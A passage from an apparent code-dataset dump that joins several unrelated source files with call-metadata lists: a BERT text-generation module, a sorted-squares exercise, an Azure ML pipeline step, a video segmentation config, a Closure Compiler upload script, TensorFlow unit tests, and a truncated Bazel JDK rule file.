)", False, 'from tests.helpers import run_conda_command\n'), ((468, 8, 468, 31), 'os.unlink', 'os.unlink', ({(468, 18, 468, 30): 'test_condarc'}, {}), '(test_condarc)', False, 'import os\n'), ((481, 25, 482, 72), 'tests.helpers.run_conda_command', 'run_conda_command', ({(481, 43, 481, 51): '"""config"""', (481, 53, 481, 61): '"""--file"""', (481, 63, 481, 75): 'test_condarc', (482, 43, 482, 50): '"""--set"""', (482, 52, 482, 64): '"""always_yes"""', (482, 66, 482, 71): '"""yep"""'}, {}), "('config', '--file', test_condarc, '--set', 'always_yes',\n 'yep')", False, 'from tests.helpers import run_conda_command\n'), ((498, 25, 499, 72), 'tests.helpers.run_conda_command', 'run_conda_command', ({(498, 43, 498, 51): '"""config"""', (498, 53, 498, 61): '"""--file"""', (498, 63, 498, 75): 'test_condarc', (499, 43, 499, 50): '"""--set"""', (499, 52, 499, 64): '"""ssl_verify"""', (499, 66, 499, 71): '"""yes"""'}, {}), "('config', '--file', test_condarc, '--set', 'ssl_verify',\n 'yes')", False, 'from tests.helpers import run_conda_command\n'), ((506, 25, 507, 84), 'tests.helpers.run_conda_command', 'run_conda_command', ({(506, 43, 506, 51): '"""config"""', (506, 53, 506, 61): '"""--file"""', (506, 63, 506, 75): 'test_condarc', (507, 43, 507, 50): '"""--set"""', (507, 52, 507, 64): '"""ssl_verify"""', (507, 66, 507, 83): '"""test_string.crt"""'}, {}), "('config', '--file', test_condarc, '--set', 'ssl_verify',\n 'test_string.crt')", False, 'from tests.helpers import run_conda_command\n'), ((515, 8, 515, 31), 'os.unlink', 'os.unlink', ({(515, 18, 515, 30): 'test_condarc'}, {}), '(test_condarc)', False, 'import os\n'), ((68, 25, 68, 51), 'conda.config.get_proxy_servers', 'config.get_proxy_servers', ({}, {}), '()', True, 'import conda.config as config\n'), ((75, 15, 75, 45), 'conda.config.rc.get', 'config.rc.get', ({(75, 29, 75, 44): '"""channel_alias"""'}, {}), "('channel_alias')", True, 'import conda.config as config\n'), ((77, 32, 79, 24), 'conda.config.normalize_urls', 'config.normalize_urls', ({(77, 54, 79, 23): "['defaults', 'system', 'https://anaconda.org/username',\n 'file:///Users/username/repo', 'username']"}, {}), "(['defaults', 'system',\n 'https://anaconda.org/username', 'file:///Users/username/repo', 'username']\n )", True, 'import conda.config as config\n'), ((82, 25, 85, 24), 'conda.config.normalize_urls', 'config.normalize_urls', ({(82, 47, 85, 13): "['defaults', 'system', 'https://conda.anaconda.org/username',\n 'file:///Users/username/repo', 'username']", (85, 15, 85, 23): '"""osx-64"""'}, {}), "(['defaults', 'system',\n 'https://conda.anaconda.org/username', 'file:///Users/username/repo',\n 'username'], 'osx-64')", True, 'import conda.config as config\n'), ((114, 19, 114, 49), 'os.path.exists', 'os.path.exists', ({(114, 34, 114, 48): '"""test_condarc"""'}, {}), "('test_condarc')", False, 'import os\n'), ((163, 12, 163, 35), 'os.unlink', 'os.unlink', ({(163, 22, 163, 34): 'test_condarc'}, {}), '(test_condarc)', False, 'import os\n'), ((261, 12, 261, 35), 'os.unlink', 'os.unlink', ({(261, 22, 261, 34): 'test_condarc'}, {}), '(test_condarc)', False, 'import os\n'), ((375, 12, 375, 35), 'os.unlink', 'os.unlink', ({(375, 22, 375, 34): 'test_condarc'}, {}), '(test_condarc)', False, 'import os\n'), ((420, 12, 420, 35), 'os.unlink', 'os.unlink', ({(420, 22, 420, 34): 'test_condarc'}, {}), '(test_condarc)', False, 'import os\n'), ((433, 19, 433, 39), 'os.path.exists', 'exists', ({(433, 26, 433, 38): 'test_condarc'}, {}), '(test_condarc)', False, 'from os.path import dirname, join, exists\n'), ((439, 19, 439, 39), 'os.path.exists', 'exists', ({(439, 26, 439, 38): 'test_condarc'}, {}), '(test_condarc)', False, 'from os.path import dirname, join, exists\n'), ((444, 12, 444, 35), 'os.unlink', 'os.unlink', ({(444, 22, 444, 34): 'test_condarc'}, {}), '(test_condarc)', False, 'import os\n'), ((472, 12, 472, 35), 'os.unlink', 'os.unlink', ({(472, 22, 472, 34): 'test_condarc'}, {}), '(test_condarc)', False, 'import os\n'), ((489, 12, 489, 35), 'os.unlink', 'os.unlink', ({(489, 22, 489, 34): 'test_condarc'}, {}), '(test_condarc)', False, 'import os\n'), ((518, 12, 518, 35), 'os.unlink', 'os.unlink', ({(518, 22, 518, 34): 'test_condarc'}, {}), '(test_condarc)', False, 'import os\n'), ((61, 13, 61, 35), 'os.path.join', 'join', ({(61, 18, 61, 26): 'root_dir', (61, 28, 61, 34): '"""envs"""'}, {}), "(root_dir, 'envs')", False, 'from os.path import dirname, join, exists\n'), ((65, 29, 65, 62), 'conda.config.pkgs_dir_from_envs_dir', 'config.pkgs_dir_from_envs_dir', ({(65, 59, 65, 61): 'pi'}, {}), '(pi)', True, 'import conda.config as config\n')]
ahmed3991/malaya
malaya/transformers/babble.py
d90be6d5b2a1393a3f8b8b1ffa8ae676cdaa083c
# Bert has a Mouth, and It Must Speak: BERT as a Markov Random Field Language Model, # by Alex Wang, Kyunghyun Cho, NeuralGen 2019 # https://colab.research.google.com/drive/1MxKZGtQ9SSBjTK5ArsZ5LKhkztzg52RV # https://arxiv.org/abs/1902.04094 import tensorflow as tf import tensorflow_probability as tfp import numpy as np import math from malaya.text.bpe import merge_sentencepiece_tokens, merge_wordpiece_tokens CLS = '[CLS]' SEP = '[SEP]' MASK = '[MASK]' def topk_distributions(logits, top_k): with tf.InteractiveSession().as_default(): logits = tf.convert_to_tensor(logits) kth_vals, kth_idx = tf.nn.top_k(logits, k = top_k) dist = tfp.distributions.categorical.Categorical(logits = kth_vals) idx = tf.gather( kth_idx, tf.expand_dims(dist.sample(), -1), batch_dims = 1 ) idx = tf.squeeze(idx, axis = -1) return idx.eval() def distributions(logits): with tf.InteractiveSession().as_default(): logits = tf.convert_to_tensor(logits) dist = tfp.distributions.categorical.Categorical(logits = logits) return dist.sample().eval() def generate_step( logits, gen_idx, top_k = 0, temperature = 1.0, sample = False, return_list = True, ): logits = logits[:, gen_idx] logits = logits / temperature if top_k > 0: idx = topk_distributions(logits, top_k) elif sample: idx = distributions(logits) else: idx = np.argmax(logits, axis = -1) return idx.tolist() if return_list else idx def tokenize_batch(batch, tokenizer): return [tokenizer.convert_tokens_to_ids(sent) for sent in batch] def untokenize_batch(batch, tokenizer): return [tokenizer.convert_ids_to_tokens(sent) for sent in batch] def get_init_text(seed_text, max_len, tokenizer, batch_size = 1): batch = [seed_text + [MASK] * max_len + [SEP] for _ in range(batch_size)] return tokenize_batch(batch, tokenizer) def sequential_generation( seed_text, model, batch_size = 5, max_len = 15, leed_out_len = 1, temperature = 1.0, top_k = 100, burnin = 20, ): mask_id = model._tokenizer.vocab['[MASK]'] sep_id = model._tokenizer.vocab['[SEP]'] seed_text = model._tokenizer.tokenize(seed_text) seed_len = len(seed_text) batch = get_init_text( seed_text, max_len, model._tokenizer, batch_size = batch_size ) for ii in range(max_len): inp = [sent[: seed_len + ii] + [sep_id] for sent in batch] batch = np.array(batch) masks = np.ones(batch.shape) segments = np.zeros(batch.shape) out = model._sess.run( model._logits, feed_dict = { model.X: batch, model.MASK: masks, model.segment_ids: segments, }, ) topk = top_k if (ii >= burnin) else 0 idxs = generate_step( out, gen_idx = seed_len + ii, top_k = topk, temperature = temperature, sample = (ii < burnin), ) for jj in range(batch_size): batch[jj][seed_len + ii] = idxs[jj] results = untokenize_batch(batch.tolist(), model._tokenizer) if hasattr(model._tokenizer, 'sp_model'): merge_function = merge_sentencepiece_tokens else: merge_function = merge_wordpiece_tokens outputs = [] for r in results: r = [(t, 0) for t in r] r = merge_function(r) r = [t[0] for t in r] outputs.append(' '.join(r)) return outputs
[((19, 17, 19, 45), 'tensorflow.convert_to_tensor', 'tf.convert_to_tensor', ({(19, 38, 19, 44): 'logits'}, {}), '(logits)', True, 'import tensorflow as tf\n'), ((20, 28, 20, 58), 'tensorflow.nn.top_k', 'tf.nn.top_k', (), '', True, 'import tensorflow as tf\n'), ((21, 15, 21, 75), 'tensorflow_probability.distributions.categorical.Categorical', 'tfp.distributions.categorical.Categorical', (), '', True, 'import tensorflow_probability as tfp\n'), ((25, 14, 25, 40), 'tensorflow.squeeze', 'tf.squeeze', (), '', True, 'import tensorflow as tf\n'), ((31, 17, 31, 45), 'tensorflow.convert_to_tensor', 'tf.convert_to_tensor', ({(31, 38, 31, 44): 'logits'}, {}), '(logits)', True, 'import tensorflow as tf\n'), ((32, 15, 32, 73), 'tensorflow_probability.distributions.categorical.Categorical', 'tfp.distributions.categorical.Categorical', (), '', True, 'import tensorflow_probability as tfp\n'), ((88, 16, 88, 31), 'numpy.array', 'np.array', ({(88, 25, 88, 30): 'batch'}, {}), '(batch)', True, 'import numpy as np\n'), ((89, 16, 89, 36), 'numpy.ones', 'np.ones', ({(89, 24, 89, 35): 'batch.shape'}, {}), '(batch.shape)', True, 'import numpy as np\n'), ((90, 19, 90, 40), 'numpy.zeros', 'np.zeros', ({(90, 28, 90, 39): 'batch.shape'}, {}), '(batch.shape)', True, 'import numpy as np\n'), ((51, 14, 51, 42), 'numpy.argmax', 'np.argmax', (), '', True, 'import numpy as np\n'), ((18, 9, 18, 32), 'tensorflow.InteractiveSession', 'tf.InteractiveSession', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((30, 9, 30, 32), 'tensorflow.InteractiveSession', 'tf.InteractiveSession', ({}, {}), '()', True, 'import tensorflow as tf\n')]
mkoryor/Python
coding patterns/two pointers/sortedarr_square.py
837ec4c03130dc4cb919fb5f1eeb4d31206790e4
""" [E] Given a sorted array, create a new array containing squares of all the number of the input array in the sorted order. Input: [-2, -1, 0, 2, 3] Output: [0, 1, 4, 4, 9] """ # Time: O(N) Space: O(n) def make_squares(arr): n = len(arr) squares = [0 for x in range(n)] highestSquareIdx = n - 1 left, right = 0, n - 1 while left <= right: leftSquare = arr[left] * arr[left] rightSquare = arr[right] * arr[right] if leftSquare > rightSquare: squares[highestSquareIdx] = leftSquare left += 1 else: squares[highestSquareIdx] = rightSquare right -= 1 highestSquareIdx -= 1 return squares
[]
Azure/aml-object-classification-pipeline
modules/evaluate/evaluate_step.py
f94e4327ebfb5534b52c5c70e82832a86c64a2d1
import os from azureml.pipeline.steps import PythonScriptStep from azureml.core.runconfig import RunConfiguration from azureml.core.conda_dependencies import CondaDependencies from azureml.pipeline.core import PipelineData from azureml.pipeline.core import PipelineParameter from azureml.pipeline.steps import EstimatorStep from azureml.train.dnn import PyTorch def evaluate_step(model_dir, test_dir, compute_target): ''' This step evaluates the trained model on the testing data and outputs the accuracy. :param model_dir: The reference to the directory containing the trained model :type model_dir: DataReference :param test_dir: The reference to the directory containing the testing data :type test_dir: DataReference :param compute_target: The compute target to run the step on :type compute_target: ComputeTarget :return: The preprocess step, step outputs dictionary (keys: accuracy_file) :rtype: EstimatorStep, dict ''' accuracy_file = PipelineData( name='accuracy_file', pipeline_output_name='accuracy_file', datastore=test_dir.datastore, output_mode='mount', is_directory=False) outputs = [accuracy_file] outputs_map = { 'accuracy_file': accuracy_file } estimator = PyTorch( source_directory=os.path.dirname(os.path.abspath(__file__)), entry_script='evaluate.py', framework_version='1.3', compute_target=compute_target, use_gpu=True) step = EstimatorStep( name="Evaluate Model", estimator=estimator, estimator_entry_script_arguments=[ '--test_dir', test_dir, '--model_dir', model_dir, '--accuracy_file', accuracy_file ], inputs=[model_dir, test_dir], outputs=outputs, compute_target=compute_target, allow_reuse=True) return step, outputs_map
[((25, 20, 30, 27), 'azureml.pipeline.core.PipelineData', 'PipelineData', (), '', False, 'from azureml.pipeline.core import PipelineData\n'), ((42, 11, 53, 25), 'azureml.pipeline.steps.EstimatorStep', 'EstimatorStep', (), '', False, 'from azureml.pipeline.steps import EstimatorStep\n'), ((36, 41, 36, 66), 'os.path.abspath', 'os.path.abspath', ({(36, 57, 36, 65): '__file__'}, {}), '(__file__)', False, 'import os\n')]
yoxu515/CFBI
configs/mobilenet_cfbi.py
0bab1e3c9fc3e3ba0629f716d60221e8f8d9d586
import torch import argparse import os import sys import cv2 import time class Configuration(): def __init__(self): self.EXP_NAME = 'mobilenetv2_cfbi' self.DIR_ROOT = './' self.DIR_DATA = os.path.join(self.DIR_ROOT, 'datasets') self.DIR_DAVIS = os.path.join(self.DIR_DATA, 'DAVIS') self.DIR_YTB = os.path.join(self.DIR_DATA, 'YTB/train') self.DIR_YTB_EVAL = os.path.join(self.DIR_DATA, 'YTB/valid') self.DIR_RESULT = os.path.join(self.DIR_ROOT, 'result', self.EXP_NAME) self.DIR_CKPT = os.path.join(self.DIR_RESULT, 'ckpt') self.DIR_LOG = os.path.join(self.DIR_RESULT, 'log') self.DIR_IMG_LOG = os.path.join(self.DIR_RESULT, 'log', 'img') self.DIR_TB_LOG = os.path.join(self.DIR_RESULT, 'log', 'tensorboard') self.DIR_EVALUATION = os.path.join(self.DIR_RESULT, 'eval') self.DATASETS = ['youtubevos'] self.DATA_WORKERS = 4 self.DATA_RANDOMCROP = (465, 465) self.DATA_RANDOMFLIP = 0.5 self.DATA_MAX_CROP_STEPS = 5 self.DATA_MIN_SCALE_FACTOR = 1. self.DATA_MAX_SCALE_FACTOR = 1.3 self.DATA_SHORT_EDGE_LEN = 480 self.DATA_RANDOM_REVERSE_SEQ = True self.DATA_DAVIS_REPEAT = 30 self.DATA_CURR_SEQ_LEN = 3 self.DATA_RANDOM_GAP_DAVIS = 3 self.DATA_RANDOM_GAP_YTB = 3 self.PRETRAIN = True self.PRETRAIN_FULL = False self.PRETRAIN_MODEL = './pretrain_models/mobilenetv2-deeplabv3p.pth.tar' self.MODEL_BACKBONE = 'mobilenet' self.MODEL_MODULE = 'networks.cfbi.cfbi' self.MODEL_OUTPUT_STRIDE = 16 self.MODEL_ASPP_OUTDIM = 256 self.MODEL_SHORTCUT_DIM = 48 self.MODEL_SEMANTIC_EMBEDDING_DIM = 100 self.MODEL_HEAD_EMBEDDING_DIM = 256 self.MODEL_PRE_HEAD_EMBEDDING_DIM = 64 self.MODEL_GN_GROUPS = 32 self.MODEL_GN_EMB_GROUPS = 25 self.MODEL_MULTI_LOCAL_DISTANCE = [2, 4, 6, 8, 10, 12] self.MODEL_LOCAL_DOWNSAMPLE = True self.MODEL_REFINE_CHANNELS = 64 # n * 32 self.MODEL_LOW_LEVEL_INPLANES = 256 if self.MODEL_BACKBONE == 'resnet' else 24 self.MODEL_RELATED_CHANNELS = 64 self.MODEL_EPSILON = 1e-5 self.MODEL_MATCHING_BACKGROUND = True self.MODEL_GCT_BETA_WD = True self.MODEL_FLOAT16_MATCHING = True self.MODEL_FREEZE_BN = True self.MODEL_FREEZE_BACKBONE = False self.TRAIN_TOTAL_STEPS = 100000 self.TRAIN_START_STEP = 0 self.TRAIN_LR = 0.01 self.TRAIN_MOMENTUM = 0.9 self.TRAIN_COSINE_DECAY = False self.TRAIN_WARM_UP_STEPS = 1000 self.TRAIN_WEIGHT_DECAY = 15e-5 self.TRAIN_POWER = 0.9 self.TRAIN_GPUS = 4 self.TRAIN_BATCH_SIZE = 8 self.TRAIN_START_SEQ_TRAINING_STEPS = self.TRAIN_TOTAL_STEPS / 2 self.TRAIN_TBLOG = False self.TRAIN_TBLOG_STEP = 60 self.TRAIN_LOG_STEP = 20 self.TRAIN_IMG_LOG = False self.TRAIN_TOP_K_PERCENT_PIXELS = 0.15 self.TRAIN_HARD_MINING_STEP = self.TRAIN_TOTAL_STEPS / 2 self.TRAIN_CLIP_GRAD_NORM = 5. self.TRAIN_SAVE_STEP = 1000 self.TRAIN_MAX_KEEP_CKPT = 8 self.TRAIN_RESUME = False self.TRAIN_RESUME_CKPT = None self.TRAIN_RESUME_STEP = 0 self.TRAIN_AUTO_RESUME = True self.TRAIN_GLOBAL_ATROUS_RATE = 1 self.TRAIN_LOCAL_ATROUS_RATE = 1 self.TRAIN_GLOBAL_CHUNKS = 20 self.TRAIN_DATASET_FULL_RESOLUTION = True self.TEST_GPU_ID = 0 self.TEST_DATASET = 'youtubevos' self.TEST_DATASET_FULL_RESOLUTION = False self.TEST_DATASET_SPLIT = ['val'] self.TEST_CKPT_PATH = None self.TEST_CKPT_STEP = None # if "None", evaluate the latest checkpoint. self.TEST_FLIP = False self.TEST_MULTISCALE = [1] self.TEST_MIN_SIZE = None self.TEST_MAX_SIZE = 800 * 1.3 if self.TEST_MULTISCALE == [1] else 800 self.TEST_WORKERS = 4 self.TEST_GLOBAL_CHUNKS = 4 self.TEST_GLOBAL_ATROUS_RATE = 2 self.TEST_LOCAL_ATROUS_RATE = 1 # dist self.DIST_ENABLE = True self.DIST_BACKEND = "gloo" self.DIST_URL = "file://./sharefile" self.DIST_START_GPU = 0 self.__check() def __check(self): if not torch.cuda.is_available(): raise ValueError('config.py: cuda is not avalable') if self.TRAIN_GPUS == 0: raise ValueError('config.py: the number of GPU is 0') for path in [self.DIR_RESULT, self.DIR_CKPT, self.DIR_LOG, self.DIR_EVALUATION, self.DIR_IMG_LOG, self.DIR_TB_LOG]: if not os.path.isdir(path): os.makedirs(path) cfg = Configuration()
[((14, 24, 14, 63), 'os.path.join', 'os.path.join', ({(14, 37, 14, 50): 'self.DIR_ROOT', (14, 52, 14, 62): '"""datasets"""'}, {}), "(self.DIR_ROOT, 'datasets')", False, 'import os\n'), ((15, 26, 15, 62), 'os.path.join', 'os.path.join', ({(15, 39, 15, 52): 'self.DIR_DATA', (15, 54, 15, 61): '"""DAVIS"""'}, {}), "(self.DIR_DATA, 'DAVIS')", False, 'import os\n'), ((16, 24, 16, 64), 'os.path.join', 'os.path.join', ({(16, 37, 16, 50): 'self.DIR_DATA', (16, 52, 16, 63): '"""YTB/train"""'}, {}), "(self.DIR_DATA, 'YTB/train')", False, 'import os\n'), ((17, 29, 17, 69), 'os.path.join', 'os.path.join', ({(17, 42, 17, 55): 'self.DIR_DATA', (17, 57, 17, 68): '"""YTB/valid"""'}, {}), "(self.DIR_DATA, 'YTB/valid')", False, 'import os\n'), ((18, 26, 18, 78), 'os.path.join', 'os.path.join', ({(18, 39, 18, 52): 'self.DIR_ROOT', (18, 54, 18, 62): '"""result"""', (18, 64, 18, 77): 'self.EXP_NAME'}, {}), "(self.DIR_ROOT, 'result', self.EXP_NAME)", False, 'import os\n'), ((19, 24, 19, 61), 'os.path.join', 'os.path.join', ({(19, 37, 19, 52): 'self.DIR_RESULT', (19, 54, 19, 60): '"""ckpt"""'}, {}), "(self.DIR_RESULT, 'ckpt')", False, 'import os\n'), ((20, 23, 20, 59), 'os.path.join', 'os.path.join', ({(20, 36, 20, 51): 'self.DIR_RESULT', (20, 53, 20, 58): '"""log"""'}, {}), "(self.DIR_RESULT, 'log')", False, 'import os\n'), ((21, 27, 21, 70), 'os.path.join', 'os.path.join', ({(21, 40, 21, 55): 'self.DIR_RESULT', (21, 57, 21, 62): '"""log"""', (21, 64, 21, 69): '"""img"""'}, {}), "(self.DIR_RESULT, 'log', 'img')", False, 'import os\n'), ((22, 26, 22, 77), 'os.path.join', 'os.path.join', ({(22, 39, 22, 54): 'self.DIR_RESULT', (22, 56, 22, 61): '"""log"""', (22, 63, 22, 76): '"""tensorboard"""'}, {}), "(self.DIR_RESULT, 'log', 'tensorboard')", False, 'import os\n'), ((23, 30, 23, 67), 'os.path.join', 'os.path.join', ({(23, 43, 23, 58): 'self.DIR_RESULT', (23, 60, 23, 66): '"""eval"""'}, {}), "(self.DIR_RESULT, 'eval')", False, 'import os\n'), ((120, 15, 120, 40), 'torch.cuda.is_available', 'torch.cuda.is_available', ({}, {}), '()', False, 'import torch\n'), ((125, 19, 125, 38), 'os.path.isdir', 'os.path.isdir', ({(125, 33, 125, 37): 'path'}, {}), '(path)', False, 'import os\n'), ((126, 16, 126, 33), 'os.makedirs', 'os.makedirs', ({(126, 28, 126, 32): 'path'}, {}), '(path)', False, 'import os\n')]
kennytilton/ConnectJS
js/matrixjs/matrix_compile.py
a16121052839b6f447718dccb008761d92094885
#!/usr/bin/python2.4 import httplib, urllib, sys # Define the parameters for the POST request and encode them in # a URL-safe format. params = urllib.urlencode([ #('js_code', sys.argv[1]), ('code_url', 'https://raw.githubusercontent.com/kennytilton/MatrixJS/master/js/matrixjs/js/Matrix/Cells.js'), ('code_url', 'https://raw.githubusercontent.com/kennytilton/MatrixJS/master/js/matrixjs/js/Matrix/Model.js'), ('code_url', 'https://raw.githubusercontent.com/kennytilton/MatrixJS/master/js/matrixjs/js/Tag.js'), ('compilation_level', 'ADVANCED_OPTIMIZATIONS'), ('output_format', 'text'), ('output_info', 'warnings'), ]) # Always use the following value for the Content-type header. headers = { "Content-type": "application/x-www-form-urlencoded" } conn = httplib.HTTPConnection('closure-compiler.appspot.com') conn.request('POST', '/compile', params, headers) response = conn.getresponse() data = response.read() print data conn.close()
[]
npow/tensorflow
tensorflow/python/util/tf_should_use_test.py
99ae68bba52bb6338af06f37bb104128d7af6fb4
# Copyright 2017 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Unit tests for tf_should_use.""" # pylint: disable=unused-import from __future__ import absolute_import from __future__ import division from __future__ import print_function import contextlib import gc import sys from tensorflow.python.framework import constant_op from tensorflow.python.platform import test from tensorflow.python.platform import tf_logging from tensorflow.python.util import tf_should_use @contextlib.contextmanager def reroute_error(): """Temporarily reroute errors written to tf_logging.error into `captured`.""" with test.mock.patch.object(tf_should_use.tf_logging, 'error') as error: with test.mock.patch.object(tf_should_use.tf_logging, 'fatal') as fatal: yield error, fatal class TfShouldUseTest(test.TestCase): def testAddShouldUseWarningWhenNotUsed(self): c = constant_op.constant(0, name='blah0') def in_this_function(): h = tf_should_use._add_should_use_warning(c) del h with reroute_error() as (error, _): in_this_function() error.assert_called() msg = '\n'.join(error.call_args[0]) self.assertIn('Object was never used', msg) self.assertIn('blah0:0', msg) self.assertIn('in_this_function', msg) self.assertFalse(gc.garbage) def testAddShouldUseFatalWhenNotUsed(self): c = constant_op.constant(0, name='blah0') def in_this_function(): h = tf_should_use._add_should_use_warning(c, fatal_error=True) del h with reroute_error() as (_, fatal): in_this_function() fatal.assert_called() msg = '\n'.join(fatal.call_args[0]) self.assertIn('Object was never used', msg) self.assertIn('blah0:0', msg) self.assertIn('in_this_function', msg) self.assertFalse(gc.garbage) def _testAddShouldUseWarningWhenUsed(self, fn, name): c = constant_op.constant(0, name=name) with reroute_error() as (error, fatal): h = tf_should_use._add_should_use_warning(c) fn(h) del h error.assert_not_called() fatal.assert_not_called() def testAddShouldUseWarningWhenUsedWithAdd(self): def add(h): _ = h + 1 self._testAddShouldUseWarningWhenUsed(add, name='blah_add') gc.collect() self.assertFalse(gc.garbage) def testAddShouldUseWarningWhenUsedWithGetName(self): def get_name(h): _ = h.name self._testAddShouldUseWarningWhenUsed(get_name, name='blah_get_name') gc.collect() self.assertFalse(gc.garbage) def testShouldUseResult(self): @tf_should_use.should_use_result def return_const(value): return constant_op.constant(value, name='blah2') with reroute_error() as (error, _): return_const(0.0) error.assert_called() msg = '\n'.join(error.call_args[0]) self.assertIn('Object was never used', msg) self.assertIn('blah2:0', msg) self.assertIn('return_const', msg) gc.collect() self.assertFalse(gc.garbage) def testShouldUseResultWhenNotReallyUsed(self): @tf_should_use.should_use_result def return_const(value): return constant_op.constant(value, name='blah3') with reroute_error() as (error, _): with self.test_session(): return_const(0.0) # Creating another op and executing it does not mark the # unused op as being "used". v = constant_op.constant(1.0, name='meh') v.eval() error.assert_called() msg = '\n'.join(error.call_args[0]) self.assertIn('Object was never used', msg) self.assertIn('blah3:0', msg) self.assertIn('return_const', msg) gc.collect() self.assertFalse(gc.garbage) # Tests that mark_used is available in the API. def testMarkUsed(self): @tf_should_use.should_use_result def return_const(value): return constant_op.constant(value, name='blah3') with self.test_session(): return_const(0.0).mark_used() if __name__ == '__main__': test.main()
[((135, 2, 135, 13), 'tensorflow.python.platform.test.main', 'test.main', ({}, {}), '()', False, 'from tensorflow.python.platform import test\n'), ((35, 7, 35, 64), 'tensorflow.python.platform.test.mock.patch.object', 'test.mock.patch.object', ({(35, 30, 35, 54): 'tf_should_use.tf_logging', (35, 56, 35, 63): '"""error"""'}, {}), "(tf_should_use.tf_logging, 'error')", False, 'from tensorflow.python.platform import test\n'), ((43, 8, 43, 45), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (), '', False, 'from tensorflow.python.framework import constant_op\n'), ((57, 8, 57, 45), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (), '', False, 'from tensorflow.python.framework import constant_op\n'), ((71, 8, 71, 42), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (), '', False, 'from tensorflow.python.framework import constant_op\n'), ((83, 4, 83, 16), 'gc.collect', 'gc.collect', ({}, {}), '()', False, 'import gc\n'), ((90, 4, 90, 16), 'gc.collect', 'gc.collect', ({}, {}), '()', False, 'import gc\n'), ((104, 4, 104, 16), 'gc.collect', 'gc.collect', ({}, {}), '()', False, 'import gc\n'), ((123, 4, 123, 16), 'gc.collect', 'gc.collect', ({}, {}), '()', False, 'import gc\n'), ((36, 9, 36, 66), 'tensorflow.python.platform.test.mock.patch.object', 'test.mock.patch.object', ({(36, 32, 36, 56): 'tf_should_use.tf_logging', (36, 58, 36, 65): '"""fatal"""'}, {}), "(tf_should_use.tf_logging, 'fatal')", False, 'from tensorflow.python.platform import test\n'), ((45, 10, 45, 50), 'tensorflow.python.util.tf_should_use._add_should_use_warning', 'tf_should_use._add_should_use_warning', ({(45, 48, 45, 49): 'c'}, {}), '(c)', False, 'from tensorflow.python.util import tf_should_use\n'), ((59, 10, 59, 68), 'tensorflow.python.util.tf_should_use._add_should_use_warning', 'tf_should_use._add_should_use_warning', (), '', False, 'from tensorflow.python.util import tf_should_use\n'), ((73, 10, 73, 50), 'tensorflow.python.util.tf_should_use._add_should_use_warning', 'tf_should_use._add_should_use_warning', ({(73, 48, 73, 49): 'c'}, {}), '(c)', False, 'from tensorflow.python.util import tf_should_use\n'), ((96, 13, 96, 54), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (), '', False, 'from tensorflow.python.framework import constant_op\n'), ((110, 13, 110, 54), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (), '', False, 'from tensorflow.python.framework import constant_op\n'), ((130, 13, 130, 54), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (), '', False, 'from tensorflow.python.framework import constant_op\n'), ((116, 12, 116, 49), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (), '', False, 'from tensorflow.python.framework import constant_op\n')]
loongarch64/bazel
tools/jdk/local_java_repository.bzl
44c30aceec076a0c25f506508704df0b9aeb6578
# Copyright 2020 The Bazel Authors. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Rules for importing and registering a local JDK.""" load(":default_java_toolchain.bzl", "JVM8_TOOLCHAIN_CONFIGURATION", "default_java_toolchain") def _detect_java_version(repository_ctx, java_bin): properties_out = repository_ctx.execute([java_bin, "-XshowSettings:properties"]).stderr # This returns an indented list of properties separated with newlines: # " java.vendor.url.bug = ... \n" # " java.version = 11.0.8\n" # " java.version.date = 2020-11-05\" strip_properties = [property.strip() for property in properties_out.splitlines()] version_property = [property for property in strip_properties if property.startswith("java.version = ")] if len(version_property) != 1: return None version_value = version_property[0][len("java.version = "):] parts = version_value.split(".") major = parts[0] if len(parts) == 1: return major elif major == "1": # handles versions below 1.8 minor = parts[1] return minor return major def local_java_runtime(name, java_home, version, runtime_name = None, visibility = ["//visibility:public"]): """Defines a java_runtime target together with Java runtime and compile toolchain definitions. Java runtime toolchain is constrained by flag --java_runtime_version having value set to either name or version argument. Java compile toolchains are created for --java_language_version flags values between 8 and version (inclusive). Java compile toolchains use the same (local) JDK for compilation. This requires a different configuration for JDK8 than the newer versions. Args: name: name of the target. java_home: Path to the JDK. version: Version of the JDK. runtime_name: name of java_runtime target if it already exists. visibility: Visibility that will be applied to the java runtime target """ if runtime_name == None: runtime_name = name native.java_runtime( name = runtime_name, java_home = java_home, visibility = visibility, ) native.config_setting( name = name + "_name_setting", values = {"java_runtime_version": name}, visibility = ["//visibility:private"], ) native.config_setting( name = name + "_version_setting", values = {"java_runtime_version": version}, visibility = ["//visibility:private"], ) native.config_setting( name = name + "_name_version_setting", values = {"java_runtime_version": name + "_" + version}, visibility = ["//visibility:private"], ) native.alias( name = name + "_settings_alias", actual = select({ name + "_name_setting": name + "_name_setting", name + "_version_setting": name + "_version_setting", "//conditions:default": name + "_name_version_setting", }), visibility = ["//visibility:private"], ) native.toolchain( name = "runtime_toolchain_definition", target_settings = [":%s_settings_alias" % name], toolchain_type = "@bazel_tools//tools/jdk:runtime_toolchain_type", toolchain = runtime_name, ) if version == "8": default_java_toolchain( name = name + "_toolchain_java8", configuration = JVM8_TOOLCHAIN_CONFIGURATION, source_version = version, target_version = version, java_runtime = runtime_name, ) elif type(version) == type("") and version.isdigit() and int(version) > 8: for version in range(8, int(version) + 1): default_java_toolchain( name = name + "_toolchain_java" + str(version), source_version = str(version), target_version = str(version), java_runtime = runtime_name, ) # else version is not recognized and no compilation toolchains are predefined def 